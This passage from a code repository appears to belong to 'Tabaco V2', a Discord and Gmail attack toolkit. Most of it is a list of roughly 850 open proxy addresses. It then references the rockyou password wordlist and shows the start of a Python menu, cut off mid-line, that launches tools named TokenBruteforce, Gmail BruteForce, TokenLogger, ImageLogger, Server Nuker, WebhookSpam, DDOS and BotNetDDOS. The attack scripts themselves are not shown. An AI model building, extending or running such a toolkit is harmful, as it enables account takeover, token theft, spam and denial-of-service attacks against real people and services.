45.156.31.0:9090 745 | 102.68.134.133:6666 746 | 103.105.68.9:8080 747 | 185.44.232.30:53281 748 | 138.68.60.8:8080 749 | 177.200.238.44:999 750 | 190.112.219.57:999 751 | 102.176.160.84:8080 752 | 144.76.42.215:8118 753 | 103.114.10.6:8080 754 | 36.95.23.89:8080 755 | 46.223.255.4:3128 756 | 138.185.190.46:8080 757 | 91.200.185.197:80 758 | 95.208.208.232:8080 759 | 80.240.202.218:8080 760 | 118.99.74.17:8080 761 | 201.49.72.226:8080 762 | 182.72.150.242:8080 763 | 176.236.99.215:8080 764 | 54.193.134.2:20096 765 | 139.59.1.14:8080 766 | 68.208.51.61:8080 767 | 103.98.131.194:8081 768 | 116.197.154.65:8080 769 | 109.193.195.10:8080 770 | 116.203.67.172:3128 771 | 1.1.220.100:8080 772 | 179.189.125.222:8080 773 | 8.208.91.118:3128 774 | 190.109.169.41:53281 775 | 103.199.157.169:40049 776 | 190.106.116.106:9090 777 | 31.179.224.42:44438 778 | 190.113.40.205:999 779 | 112.14.47.6:52024 780 | 45.189.252.23:999 781 | 219.128.76.3:8080 782 | 5.16.0.97:1256 783 | 36.89.89.167:8888 784 | 185.42.60.242:8080 785 | 49.231.174.182:80 786 | 115.74.254.226:8080 787 | 112.6.117.178:8085 788 | 188.234.248.18:8080 789 | 166.159.90.56:53281 790 | 200.39.62.158:9991 791 | 182.253.60.170:8083 792 | 200.111.182.6:443 793 | 182.253.207.36:8080 794 | 222.74.202.240:8080 795 | 180.149.235.39:8080 796 | 159.203.61.169:8080 797 | 213.230.121.63:8080 798 | 222.74.202.234:8081 799 | 45.250.226.14:3128 800 | 85.196.133.98:8080 801 | 212.200.246.24:80 802 | 143.255.52.67:31158 803 | 185.76.215.54:80 804 | 91.121.134.85:9999 805 | 61.153.251.150:22222 806 | 222.252.156.61:62694 807 | 88.214.11.199:8081 808 | 186.97.239.98:8080 809 | 43.255.113.232:8085 810 | 103.92.213.253:43399 811 | 86.121.126.153:8083 812 | 27.191.60.152:3256 813 | 103.159.46.2:83 814 | 185.153.180.222:8080 815 | 109.200.159.29:8080 816 | 211.110.60.22:3128 817 | 95.67.9.186:8080 818 | 81.134.57.82:3128 819 | 188.72.51.245:8080 820 | 122.15.211.125:80 821 | 188.133.153.187:8081 822 | 125.73.131.137:9091 823 | 222.74.202.243:8080 824 | 131.161.131.1:45005 825 | 203.112.223.126:8080 826 | 201.249.61.60:8080 827 | 185.200.37.188:9090 828 | 103.155.156.10:8080 829 | 64.124.38.125:8080 830 | 121.43.190.89:3128 831 | 82.114.101.86:1256 832 | 172.105.40.232:80 833 | 80.75.13.203:80 834 | 217.60.194.43:8080 835 | 103.122.202.2:8080 836 | 94.23.172.208:43567 837 | 194.233.73.107:443 838 | 103.250.153.242:31382 839 | 198.199.86.11:3128 840 | 128.68.63.80:55443 841 | 45.11.6.117:53281 842 | 188.68.52.45:80 843 | 104.248.48.252:31583 844 | 170.79.12.72:9090 845 | 122.155.165.191:3128 846 | 103.135.6.10:63123 847 | 36.95.21.92:8080 848 | 94.74.132.129:808 849 | 185.202.165.1:53281 850 | 139.162.20.252:8080 851 | 190.121.131.6:8080 852 | 200.125.168.150:999 853 | 175.101.19.225:83 854 | 103.70.130.134:83 855 | 36.92.83.178:8080 856 | 82.114.118.142:1256 857 | 45.116.229.183:8080 858 | 139.255.123.4:8080 859 | 89.208.35.81:3128 860 | 89.218.58.122:8080 861 | 93.48.169.74:3128 862 | 36.67.73.129:8080 863 | 197.231.198.172:42461 864 | 203.76.114.197:8080 865 | 182.84.144.69:3256 866 | 200.24.135.58:999 867 | 41.73.5.190:8080 868 | 189.71.131.247:9999 869 | 194.233.73.104:443 870 | 50.241.148.97:8080 871 | 111.51.67.223:8080 872 | 202.152.12.202:8080 873 | 184.82.128.211:8080 874 | 91.207.238.107:56288 875 | 103.135.0.145:8080 876 | 117.94.222.10:3256 877 | 81.23.114.198:8080 878 | 204.199.108.98:8080 879 | 103.119.144.4:55443 880 | 119.93.235.205:41731 881 | 202.147.207.253:38646 882 | 176.214.35.58:1256 883 | 185.21.67.212:8080 884 | 89.28.53.42:8080 885 | 190.85.115.78:3128 886 | 51.75.206.209:80 887 | 139.99.74.79:8080 888 | 188.133.152.25:1256 889 | 134.3.255.7:3128 890 | 103.212.92.253:48434 891 | 41.220.114.154:8080 892 | 103.70.79.3:8080 893 | 217.196.20.150:8080 894 | 177.229.201.194:9991 895 | 46.223.255.2:8080 896 | 95.140.27.135:58901 897 | 185.238.239.28:8090 898 | 45.127.246.98:8080 899 | 160.202.9.53:8080 900 | 103.195.72.1:84 901 | 118.70.12.171:53281 902 | 31.220.183.217:53281 903 | 183.247.211.151:30001 904 | 212.126.96.154:8080 905 | 47.57.188.208:80 906 | 94.182.209.82:8080 907 | 47.52.159.153:8081 908 | 213.6.227.38:45730 909 | 62.68.24.143:8118 910 | 177.11.26.208:8083 911 | 187.95.114.125:3128 912 | 162.55.182.109:443 913 | 85.173.165.36:46330 914 | 181.188.203.169:999 915 | 222.74.202.243:80 916 | 182.79.103.121:80 917 | 83.12.149.202:8080 918 | 31.131.67.14:8080 919 | 117.141.155.241:53281 920 | 190.110.204.194:999 921 | 103.70.79.2:8080 922 | 101.255.72.171:443 923 | 8.208.81.46:1088 924 | 202.142.158.114:8080 925 | 194.233.69.90:443 926 | 109.200.156.102:8080 927 | 103.80.237.211:3888 928 | 182.84.144.166:3256 929 | 95.208.208.233:8080 930 | 103.146.222.2:83 931 | 187.44.1.172:8080 932 | 77.236.243.39:1256 933 | 223.100.215.26:8080 934 | 155.0.181.254:43496 935 | 91.93.48.252:9090 936 | 189.203.10.213:999 937 | 179.191.245.58:3128 938 | 95.215.48.93:8080 939 | 96.2.161.239:80 940 | 176.101.221.119:8080 941 | 51.79.142.43:8080 942 | 222.74.202.231:80 943 | 194.213.43.166:60530 944 | 119.96.109.233:8888 945 | 27.111.45.18:55443 946 | 37.49.127.234:3128 947 | 88.255.102.102:8080 948 | 8.210.210.60:80 949 | 202.165.47.90:55443 950 | 91.240.208.142:3128 951 | 176.9.75.42:8080 952 | 190.216.115.117:8080 953 | 200.215.171.238:8080 954 | 41.75.85.22:8080 955 | 45.122.246.10:8080 956 | 76.80.19.107:8080 957 | 185.230.105.243:8080 958 | 91.93.118.3:8090 959 | 189.50.4.226:8080 960 | 151.22.181.213:8080 961 | 201.20.110.54:55443 962 | 103.19.56.159:3127 963 | 190.1.201.58:8080 964 | 43.255.113.232:8083 965 | 149.172.255.6:8080 966 | 183.88.0.205:8080 967 | 88.198.24.108:8080 968 | 203.188.251.226:8080 969 | 43.224.10.13:6666 970 | 139.99.73.249:8080 971 | 69.197.181.202:3128 972 | 80.244.229.55:1256 973 | 206.189.86.178:80 974 | 47.90.126.138:9090 975 | 158.140.190.242:55443 976 | 190.14.213.2:8080 977 | 68.188.63.149:8080 978 | 122.15.211.126:80 979 | 91.144.139.3:3128 980 | 203.66.65.6:3128 981 | 179.1.82.18:999 982 | 84.22.61.74:8080 983 | 222.165.218.130:8080 984 | 188.169.38.111:8080 985 | 186.16.206.218:999 986 | 221.236.16.197:8118 987 | 183.195.106.118:8118 988 | 47.254.90.125:8080 989 | 95.47.119.247:8080 990 | 85.216.127.187:3128 991 | 138.94.255.227:80 992 | 3.121.94.146:80 993 | 103.203.65.2:45692 994 | 173.208.140.122:3128 995 | 190.107.22.255:999 996 | 80.244.236.205:1256 997 | 187.191.25.151:999 998 | 222.74.202.243:8081 999 | 47.254.94.236:1088 1000 | 222.74.202.245:80 1001 | 182.84.144.100:3256 1002 | 186.67.26.178:999 1003 | 167.71.230.124:8080 1004 | 200.69.80.241:8080 1005 | 45.65.58.10:8080 1006 | 91.93.48.251:9090 1007 | 103.19.56.152:3127 1008 | 94.56.27.42:3128 1009 | 218.75.102.198:8000 1010 | 68.188.59.198:80 1011 | 47.88.7.115:3129 1012 | 117.102.67.210:8070 1013 | 77.236.248.237:8080 1014 | 177.11.84.254:8080 1015 | 202.169.47.108:8080 1016 | 54.93.108.168:9300 1017 | 154.236.162.59:8888 1018 | 36.95.65.99:8019 1019 | 175.106.10.226:51630 1020 | 36.92.22.70:8080 1021 | 194.233.73.108:443 1022 | 103.216.82.43:6666 1023 | 27.116.51.186:6666 1024 | 88.255.234.193:80 1025 | 217.195.203.29:3131 1026 | 96.94.136.60:9999 1027 | 176.214.97.13:8081 1028 | 175.101.81.251:80 1029 | 91.89.89.9:8080 1030 | 118.101.57.61:80 1031 | 185.190.38.21:8080 1032 | 219.151.157.130:3128 1033 | 109.254.101.214:9090 1034 | 103.204.119.186:8080 1035 | 201.238.242.38:999 1036 | 27.123.1.46:3128 1037 | 35.246.142.152:80 1038 | 176.236.232.66:9090 1039 | 209.91.184.157:80 1040 | 110.232.66.209:808 1041 | 203.189.89.158:8080 1042 | 181.129.98.146:8080 1043 | 182.52.229.165:8080 1044 | 118.117.188.131:3256 1045 | 45.234.187.255:8080 1046 | 36.94.183.153:8080 1047 | 103.60.173.6:8080 1048 | 91.230.199.174:61440 1049 | 201.217.245.229:49160 1050 | 83.171.103.67:8080 1051 | 115.124.73.33:9890 1052 | 103.14.198.209:82 1053 | 168.196.211.10:55443 1054 | 59.120.147.82:3128 1055 | 190.2.210.123:999 1056 | 96.90.234.245:80 1057 | 103.161.164.105:8181 1058 | 197.211.45.4:10000 1059 | 185.100.196.56:8080 1060 | 91.197.10.22:8888 1061 | 62.210.69.176:5566 1062 | 186.233.98.173:23500 1063 | 175.106.11.73:7878 1064 | 109.254.92.67:9090 1065 | 222.74.202.238:8080 1066 | 46.5.252.54:3128 1067 | 187.32.76.97:3128 1068 | 185.28.250.95:8080 1069 | 203.76.124.35:8080 1070 | 78.188.142.249:9090 1071 | 94.141.117.1:8080 1072 | 209.45.111.198:45729 1073 | 77.233.5.68:55443 1074 | 222.74.202.229:8080 1075 | 222.74.202.245:8080 1076 | 195.191.182.103:8070 1077 | 176.235.83.113:8080 1078 | 146.59.178.57:3128 1079 | 222.74.202.229:80 1080 | 197.155.158.22:80 1081 | 103.83.178.202:8080 1082 | 36.67.82.146:8000 1083 | 222.74.202.230:8080 1084 | 45.70.238.180:999 1085 | 85.26.146.169:80 1086 | 213.6.66.66:48687 1087 | 80.93.213.210:3133 1088 | 66.96.239.161:8080 1089 | 173.246.129.9:80 1090 | 103.199.156.145:40049 1091 | 222.74.202.245:9999 1092 | 165.73.129.149:56975 1093 | 47.89.153.213:80 1094 | 196.214.185.85:80 1095 | 103.4.164.204:8080 1096 | 46.229.67.198:47437 1097 | 212.174.11.111:9090 1098 | 190.196.176.5:60080 1099 | 81.33.4.214:61711 1100 | 202.141.233.66:8080 1101 | 23.101.58.2:3128 1102 | 94.54.208.189:80 1103 | 216.155.89.66:999 1104 | 85.216.127.189:3128 1105 | 219.92.40.123:8080 1106 | 193.242.151.44:8080 1107 | 201.102.190.70:8080 1108 | 101.205.120.102:80 1109 | 187.237.121.46:80 1110 | 138.68.60.8:3128 1111 | 61.216.43.102:8080 1112 | 111.92.240.134:30598 1113 | 185.120.217.37:8080 1114 | 45.71.201.122:999 1115 | 89.140.125.17:80 1116 | 178.88.185.2:3128 1117 | 195.154.207.153:80 1118 | 222.74.202.239:80 1119 | 200.105.215.18:33630 1120 | 118.117.188.85:3256 1121 | 212.175.118.178:8080 1122 | 47.115.156.64:3128 1123 | 201.157.252.38:9999 1124 | 45.181.190.2:8090 1125 | 218.14.108.53:8060 1126 | 182.16.171.65:43188 1127 | 146.120.168.237:8181 1128 | 191.242.187.59:8080 1129 | 1.10.187.237:8080 1130 | 51.81.82.175:80 1131 | 1.186.80.68:80 1132 | 46.5.252.50:3128 1133 | 190.217.1.101:32192 1134 | 20.82.200.229:3128 1135 | 5.39.17.96:80 1136 | 8.208.91.118:8800 1137 | 88.99.134.61:8080 1138 | 45.156.31.26:9090 1139 | 34.138.225.120:8888 1140 | 150.129.207.84:30093 1141 | 117.3.136.218:55443 1142 | 180.250.102.194:8080 1143 | 124.40.245.178:3128 1144 | 198.27.74.6:9300 1145 | 195.178.56.33:8080 1146 | 182.84.144.76:3256 1147 | 27.105.130.93:8080 1148 | 91.224.182.49:8080 1149 | 163.47.208.161:8080 1150 | 36.92.153.95:80 1151 | 183.213.28.64:3128 1152 | 116.202.165.119:3128 1153 | 35.245.254.223:3128 1154 | 122.15.211.124:80 1155 | 200.125.169.101:999 1156 | 109.70.189.70:56408 1157 | 180.148.4.194:8080 1158 | 204.199.109.154:999 1159 | 193.37.152.92:3128 1160 | 81.95.230.211:3128 1161 | 124.41.211.196:31120 1162 | 37.17.9.28:44938 1163 | 94.199.2.235:8080 1164 | 118.117.188.196:3256 1165 | 91.93.73.226:7070 1166 | 161.35.70.249:3128 1167 | 81.211.36.162:8080 1168 | 183.91.0.121:3128 1169 | 175.101.80.134:8080 1170 | 120.28.57.114:8080 1171 | 212.174.11.110:9090 1172 | 90.189.110.170:3128 1173 | 78.46.251.251:80 1174 | 213.157.47.38:8080 1175 | 154.113.69.154:8080 1176 | 79.119.155.137:53281 1177 | 35.180.70.8:9300 1178 | 174.32.108.254:87 1179 | 91.93.73.229:7070 1180 | 116.206.58.157:8181 1181 | 124.219.176.139:39589 1182 | 77.236.237.241:1256 1183 | 118.117.188.9:3256 1184 | 201.217.55.97:8080 1185 | 31.128.75.116:8080 1186 | 222.74.202.240:9999 1187 | 94.232.11.178:46449 1188 | 222.74.202.238:8081 1189 | 34.118.117.240:80 1190 | 91.93.156.130:8080 1191 | 103.1.184.238:3128 1192 | 103.76.12.42:8181 1193 | 165.73.128.125:56975 1194 | 36.255.86.114:84 1195 | 192.241.140.214:3128 1196 | 3.20.236.208:49205 1197 | 45.71.114.154:999 1198 | 20.88.192.37:3128 1199 | 89.111.105.105:41258 1200 | 79.143.87.138:9090 1201 | 43.224.10.30:6666 1202 | 223.27.194.66:63141 1203 | 219.92.40.123:80 1204 | 95.217.34.209:3128 1205 | 134.3.255.6:8080 1206 | 190.109.121.1:999 1207 | 05.10.27.146:3128 1208 | 190.52.194.122:999 1209 | 111.225.152.159:3256 1210 | 158.69.71.69:9300 1211 | 123.231.221.178:8080 1212 | 23.92.29.41:8118 1213 | 37.49.127.235:8080 1214 | 94.28.30.252:8080 1215 | 8.208.91.118:8081 1216 | 222.186.30.70:808 1217 | 189.84.122.34:8080 1218 | 47.254.126.34:1088 1219 | 103.14.198.169:83 1220 | 161.35.70.249:8080 1221 | 124.106.230.55:8080 1222 | 105.112.191.250:3128 1223 | 47.101.56.89:8085 1224 | 179.56.196.245:999 1225 | 222.165.221.12:58687 1226 | 175.176.185.106:3129 1227 | 43.241.131.105:8080 1228 | 49.231.200.212:8080 1229 | 52.78.172.171:80 1230 | 89.249.82.33:8090 1231 | 46.5.252.58:8080 1232 | 93.170.97.160:9999 1233 | 45.172.111.12:999 1234 | 203.142.69.67:8080 1235 | 201.63.80.226:80 1236 | 135.181.71.29:8080 1237 | 121.139.218.165:31409 1238 | 179.106.168.2:43345 1239 | 201.249.161.51:999 1240 | 118.117.188.199:3256 1241 | 103.216.147.65:8080 1242 | 91.89.89.13:8080 1243 | 1.224.161.60:8081 1244 | 196.216.215.11:56975 1245 | 88.199.164.140:8081 1246 | 177.8.113.61:50297 1247 | 62.252.146.74:8080 1248 | 78.111.97.182:3142 1249 | 195.9.173.38:63141 1250 | 150.129.250.28:33846 1251 | 64.124.38.126:8080 1252 | 5.10.27.146:3128 1253 | 203.223.34.2:8090 1254 | 78.92.231.44:55443 1255 | 43.255.113.232:82 1256 | 92.253.232.16:8080 1257 | 118.97.164.19:8080 1258 | 138.122.7.33:32192 1259 | 125.163.161.250:8080 1260 | 36.37.180.59:65205 1261 | 103.144.77.212:8083 1262 | 123.27.3.246:39915 1263 | 36.66.172.121:39810 1264 | 93.117.72.27:43631 1265 | 96.2.228.18:8080 1266 | 18.189.31.87:80 1267 | 185.142.67.23:8080 1268 | 51.77.123.244:80 1269 | 110.78.22.40:8080 1270 | 119.93.234.41:41731 1271 | 170.239.180.58:999 1272 | 43.255.113.232:8082 1273 | 176.9.119.170:8080 1274 | 182.253.191.132:8080 1275 | 94.199.2.230:8080 1276 | 45.172.111.35:999 1277 | 183.88.5.9:8080 1278 | 167.71.5.83:3128 1279 | 46.5.252.52:8080 1280 | 181.40.122.102:8080 1281 | 80.78.237.2:55443 1282 | 193.68.57.81:3128 1283 | 118.179.173.253:40836 1284 | 5.59.136.230:8080 1285 | 88.255.234.192:80 1286 | 188.168.56.82:55443 1287 | 91.240.97.69:8080 1288 | 52.23.129.250:80 1289 | 117.239.240.202:53281 1290 | 201.46.28.222:63238 1291 | 191.97.19.57:999 1292 | 66.248.217.9:8080 1293 | 83.111.183.37:80 1294 | 45.112.124.133:8080 1295 | 202.46.38.11:8080 1296 | 183.91.0.124:3128 1297 | 77.46.142.150:8080 1298 | 58.209.234.201:3389 1299 | 8.208.91.118:81 1300 | 222.128.60.203:1080 1301 | 178.216.2.229:8080 1302 | 91.192.2.168:53281 1303 | 190.109.6.113:999 1304 | 193.86.229.230:8080 1305 | 103.146.30.178:8080 1306 | 91.93.73.228:7070 1307 | 194.233.73.106:443 1308 | 190.52.198.2:999 1309 | 200.155.139.242:3128 1310 | 79.127.56.148:8080 1311 | 8.208.91.118:8000 1312 | 110.232.78.55:55667 1313 | 50.206.25.110:80 1314 | 37.230.147.206:8080 1315 | 61.150.96.27:36880 1316 | 177.87.168.97:53281 1317 | 182.253.108.186:8080 1318 | 36.67.89.179:65205 1319 | 182.84.144.4:3256 1320 | 190.109.168.217:8080 1321 | 36.94.13.63:3128 1322 | 119.18.152.210:3127 1323 | 124.204.33.162:8000 1324 | 36.94.161.219:8080 1325 | 136.243.81.120:8080 1326 | 196.27.106.112:8080 1327 | 36.67.25.137:8080 1328 | 190.217.1.89:32192 1329 | 201.143.252.172:8080 1330 | 43.255.113.232:8081 1331 | 190.97.254.114:8080 1332 | 182.48.245.34:80 1333 | 190.52.129.39:8080 1334 | 103.14.198.217:83 1335 | 45.7.177.197:34234 1336 | 122.154.69.17:80 1337 | 81.91.144.190:55443 1338 | 95.208.208.230:8080 1339 | 222.74.202.230:9999 1340 | 203.177.133.235:8080 1341 | 103.14.198.129:84 1342 | 36.89.190.85:8080 1343 | 201.20.105.198:8080 1344 | 203.190.2.181:8080 1345 | 91.186.102.169:8082 1346 | 213.230.69.193:3128 1347 | 189.196.46.2:999 1348 | 91.203.36.102:45551 1349 | 200.223.187.130:8080 1350 | 190.90.252.201:999 1351 | 209.97.150.167:8080 1352 | 188.133.153.201:1256 1353 | 122.3.41.154:8090 1354 | 103.73.75.69:8080 1355 | 103.52.210.237:80 1356 | 61.7.138.169:8080 1357 | 113.96.223.239:4002 1358 | 190.232.50.10:999 1359 | 101.132.186.175:9090 1360 | 204.199.84.229:8090 1361 | 77.195.143.92:80 1362 | 36.67.57.45:30066 1363 | 93.86.63.73:8080 1364 | 47.52.105.162:6666 1365 | 91.216.66.70:32306 1366 | 200.29.111.215:999 1367 | 217.8.51.200:3128 1368 | 45.6.228.158:8080 1369 | 104.248.249.47:3122 1370 | 190.119.211.74:8080 1371 | 60.216.20.213:8001 1372 | 180.180.218.250:8080 1373 | 36.92.189.66:8080 1374 | 180.179.98.22:3128 1375 | 84.204.40.155:8080 1376 | 36.94.142.163:8000 1377 | 190.2.213.129:999 1378 | 41.193.14.5:3128 1379 | 88.198.50.103:8080 1380 | 103.108.57.9:3127 1381 | 14.97.2.110:80 1382 | 66.96.253.234:8080 1383 | 183.88.2.153:8080 1384 | 88.255.234.197:80 1385 | 172.107.227.2:443 1386 | 138.97.200.207:8080 1387 | 176.236.178.98:9090 1388 | 202.164.152.233:8080 1389 | 51.159.24.172:3163 1390 | 27.147.209.215:8080 1391 | 80.87.217.6:8080 1392 | 58.97.193.228:55443 1393 | 104.244.75.218:8080 1394 | 47.254.90.125:8800 1395 | 5.56.134.237:55963 1396 | 159.65.5.141:65534 1397 | 1.186.83.4:80 1398 | 58.97.72.83:8080 1399 | 144.48.112.34:8080 1400 | 223.241.77.19:3256 1401 | 85.112.74.4:8080 1402 | 222.127.16.230:8080 1403 | 113.160.224.224:55443 1404 | 121.230.211.247:3256 1405 | 223.241.77.72:3256 1406 | 103.166.38.1:8080 1407 | 103.36.100.248:8000 1408 | 177.152.99.239:8083 1409 | 58.212.42.15:3256 1410 | 49.0.39.10:8080 1411 | 138.255.240.66:41466 1412 | 190.13.82.102:999 1413 | 186.96.110.154:999 1414 | 147.75.113.227:8080 1415 | 114.5.199.200:8182 1416 | 223.241.77.97:3256 1417 | 138.121.216.137:8083 1418 | 191.242.189.13:8080 1419 | 1.0.205.87:8080 1420 | 58.212.41.98:3256 1421 | 125.62.213.18:84 1422 | 200.58.170.65:999 1423 | 190.120.249.246:999 1424 | 62.133.168.72:55443 1425 | 117.94.222.49:3256 1426 | 78.30.198.160:8080 1427 | 170.83.108.69:8080 1428 | 111.68.26.237:8080 1429 | 139.5.132.245:8080 1430 | 171.233.151.214:55443 1431 | 190.92.9.162:999 1432 | 190.61.37.171:999 1433 | 185.190.38.1:8080 1434 | 103.168.44.3:3127 1435 | 185.34.22.225:37879 1436 | 45.64.255.104:8080 1437 | 160.238.242.42:8080 1438 | 177.87.174.21:53281 1439 | 177.87.174.4:53281 1440 | 72.224.119.193:8080 1441 | 41.190.92.84:48515 1442 | 103.57.11.106:55443 1443 | 103.14.198.234:84 1444 | 177.190.197.28:8080 1445 | 170.82.37.161:999 1446 | 118.70.67.161:8080 1447 | 109.167.141.137:8080 1448 | 89.204.214.142:8080 1449 | 200.24.132.195:999 1450 | 103.131.16.105:8080 1451 | 41.79.191.183:80 1452 | 203.189.229.146:8080 1453 | 96.95.164.41:3128 1454 | 111.118.128.140:41344 1455 | 185.175.119.206:36442 1456 | 115.124.76.130:8080 1457 | 103.206.253.162:8080 1458 | 103.155.198.50:8080 1459 | 103.78.252.30:8080 1460 | 115.75.35.12:42108 1461 | 103.219.112.178:8080 1462 | 77.28.97.34:48458 1463 | 43.229.252.28:53281 1464 | 103.100.84.23:8080 1465 | 103.11.106.174:8181 1466 | 168.90.100.247:8080 1467 | 85.198.185.26:8080 1468 | 131.100.51.1:999 1469 | 185.110.28.228:8080 1470 | 179.49.114.95:999 1471 | 77.28.96.196:56145 1472 | 117.216.137.45:3127 1473 | 168.181.196.76:8080 1474 | 175.106.10.227:7878 1475 | 103.152.101.250:8080 1476 | 103.152.101.241:8080 1477 | 103.160.56.126:8080 1478 | 103.157.249.106:8080 1479 | 187.216.93.20:55443 1480 | 77.120.92.73:8080 1481 | 200.69.210.59:80 1482 | 212.112.113.252:80 1483 | 27.116.63.120:7999 1484 | 190.186.1.46:55830 1485 | 179.49.160.190:999 1486 | 223.241.77.145:3256 1487 | 82.65.187.32:80 1488 | 123.171.42.145:3256 1489 | 194.44.87.245:8080 1490 | 111.92.166.122:8089 1491 | 109.254.125.212:9090 1492 | 202.191.108.42:8080 1493 | 180.180.170.188:8080 1494 | 185.216.25.170:3128 1495 | 103.153.232.3:8080 1496 | 103.153.232.1:8080 1497 | 129.226.52.93:443 1498 | 120.42.133.79:3256 1499 | 14.170.154.10:8080 1500 | 213.142.148.161:8080 1501 | 45.228.77.244:999 1502 | 103.14.198.145:84 1503 | 160.19.232.85:3128 1504 | 181.10.129.85:8080 1505 | 103.151.227.34:8080 1506 | 119.110.75.30:63123 1507 | 223.241.77.37:3256 1508 | 212.100.84.10:8080 1509 | 103.53.76.82:8080 1510 | 103.115.164.99:8080 1511 | 3.23.44.179:80 1512 | 170.83.60.124:55443 1513 | 41.180.68.195:8080 1514 | 103.82.233.2:53281 1515 | 103.148.192.75:8080 1516 | 103.21.170.230:3128 1517 | 158.140.167.148:53281 1518 | 103.14.198.178:83 1519 | 190.186.18.161:999 1520 | 45.230.169.10:999 1521 | 103.14.199.225:83 1522 | 103.78.252.113:8080 1523 | 103.7.27.186:8080 1524 | 45.236.104.179:999 1525 | 45.236.104.180:999 1526 | 197.245.230.122:41026 1527 | 103.28.148.203:8080 1528 | 103.163.217.141:10000 1529 | 103.163.217.155:10000 1530 | 103.124.111.33:8080 1531 | 103.90.145.196:8080 1532 | 159.192.147.186:8080 1533 | 47.75.254.142:8888 1534 | 101.255.171.105:8080 1535 | 155.93.96.210:8080 1536 | 185.58.18.149:8080 1537 | 185.190.38.150:8080 1538 | 170.79.97.186:8080 1539 | 190.61.90.141:999 1540 | 124.106.57.182:8080 1541 | 182.93.10.83:8090 1542 | 187.1.57.206:20183 1543 | 45.185.162.130:999 1544 | 45.174.87.18:999 1545 | 189.50.10.55:8080 1546 | 103.209.230.129:8080 1547 | 203.33.113.149:80 1548 | 203.33.113.25:80 1549 | 203.33.113.79:80 1550 | 103.148.39.38:82 1551 | 177.10.162.222:8080 1552 | 103.149.143.2:8080 1553 | 45.173.6.145:999 1554 | 102.141.197.17:8080 1555 | 177.11.84.233:8080 1556 | 202.146.232.179:8888 1557 | 78.30.230.117:50932 1558 | 176.111.73.57:8081 1559 | 181.224.162.205:999 1560 | 187.190.115.139:9991 1561 | 195.162.71.112:8080 1562 | 117.54.106.241:8080 1563 | 170.239.222.84:8080 1564 | 131.0.4.254:8080 1565 | 103.250.166.12:6666 1566 | 119.110.209.94:3128 1567 | 81.140.102.191:32231 1568 | 202.62.95.101:8080 1569 | 223.241.77.253:3256 1570 | 182.53.197.156:43060 1571 | 183.82.111.34:80 1572 | 175.101.16.137:84 1573 | 109.73.181.197:49759 1574 | 190.95.134.72:999 1575 | 200.119.218.89:999 1576 | 49.0.41.81:38235 1577 | 104.238.195.10:80 1578 | 186.64.95.1:999 1579 | 195.91.221.230:55443 1580 | 158.255.51.213:61468 1581 | 131.100.51.250:999 1582 | 103.78.252.65:8080 1583 | 190.216.36.30:8080 1584 | 200.32.80.110:8080 1585 | 43.225.186.21:80 1586 | 182.180.48.62:8085 1587 | 195.158.81.121:55443 1588 | 103.209.178.172:34751 1589 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/rockyou.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/rockyou.txt -------------------------------------------------------------------------------- /Tabaco V2/Tools/workedCodes.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/workedCodes.txt -------------------------------------------------------------------------------- /Tabaco V2/menu.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | import subprocess 4 | from colorama import init, Fore, Style 5 | 6 | os.system("color 2") 7 | 8 | def load_proxies(): 9 | print("Loading proxies...") 10 | for i in range(5): 11 | time.sleep(0.1) 12 | print(".", end='', flush=True) 13 | time.sleep(1) 14 | print("\nProxies loaded successfully!") 15 | time.sleep(0.5) 16 | print("Activating proxies...") 17 | for i in range(5): 18 | time.sleep(0.1) 19 | print(".", end='', flush=True) 20 | time.sleep(1) 21 | print("\nProxies activated!") 22 | time.sleep(0.5) 23 | 24 | with open('Tools/proxies.txt') as f: 25 | proxies = f.readlines() 26 | 27 | load_proxies() 28 | 29 | init(autoreset=True) 30 | 31 | 32 | options = [ 33 | "TokenBruteforce", 34 | "WebhookSpam", 35 | "NitroCheck", 36 | "Vanity Checker", 37 | "Gmail BruteForce", 38 | "Server Nuker", 39 | "Email Spam", 40 | "ImageLogger", 41 | "TokenLogger", 42 | "DDOS", 43 | "NitroGen", 44 | "ServerJoiner", 45 | "TokenGen", 46 | "Discord Spam", 47 | "ID To Token", 48 | "Token Checker", 49 | "BotNetDDOS", 50 | "Stresser", 51 | "IP Pinger" 52 | ] 53 | 54 | print(F"{Fore.LIGHTGREEN_EX}████████╗ █████╗ ██████╗ █████╗ ██████╗ ██████╗ ") 55 | print(F"{Fore.GREEN}╚══██╔══╝██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔═══██╗") 56 | time.sleep(0.1) 57 | print(F"{Fore.LIGHTGREEN_EX} ██║ ███████║██████╔╝███████║██║ ██║ ██║") 58 | time.sleep(0.1) 59 | print(F"{Fore.GREEN} ██║ ██╔══██║██╔══██╗██╔══██║██║ ██║ ██║") 60 | time.sleep(0.1) 61 | print(F"{Fore.LIGHTGREEN_EX} ██║ ██║ ██║██████╔╝██║ ██║╚██████╗╚██████╔╝") 62 | time.sleep(0.1) 63 | print(F"{Fore.GREEN} ╚═╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ") 64 | time.sleep(0.1) 65 | print(F"{Fore.LIGHTGREEN_EX}HAWK TAWW!") 66 | print(F"{Fore.RED}SKIBIDI TOLIET") 67 | time.sleep(2) 68 | 69 | os.system("color 2") 70 | 71 | print("If Your Done Using a Tool Press Control + C To Go back to Menu") 72 | 73 | print("made bye me and only me") 74 | 75 | def menu(): 76 | while True: 77 | 78 | print(Fore.LIGHTGREEN_EX + "\nChoose an option:\n") 79 | for i in range(len(options)): 80 | print(Fore.LIGHTGREEN_EX + str(i+1) + ". " + options[i]) 81 | 82 | # Get the user's choice 83 | choice = input(Fore.LIGHTGREEN_EX + "\nEnter the number of your choice: ") 84 | 85 | # Run the chosen script, if it exists 86 | try: 87 | script_name = options[int(choice)-1] 88 | if script_name == "TokenBruteforce": 89 | subprocess.call(["python", "Tools/TokenBruteforce.py"]) 90 | elif script_name == "WebhookSpam": 91 | subprocess.call(["python", "Tools/WebhookSpam.py"]) 92 | elif script_name == "NitroCheck": 93 | subprocess.call(["python", "Tools/NitroCheck.py"]) 94 | elif script_name == "Vanity Checker": 95 | subprocess.call(["python", "Tools/Vanity Checker.py"]) 96 | elif script_name == "Gmail 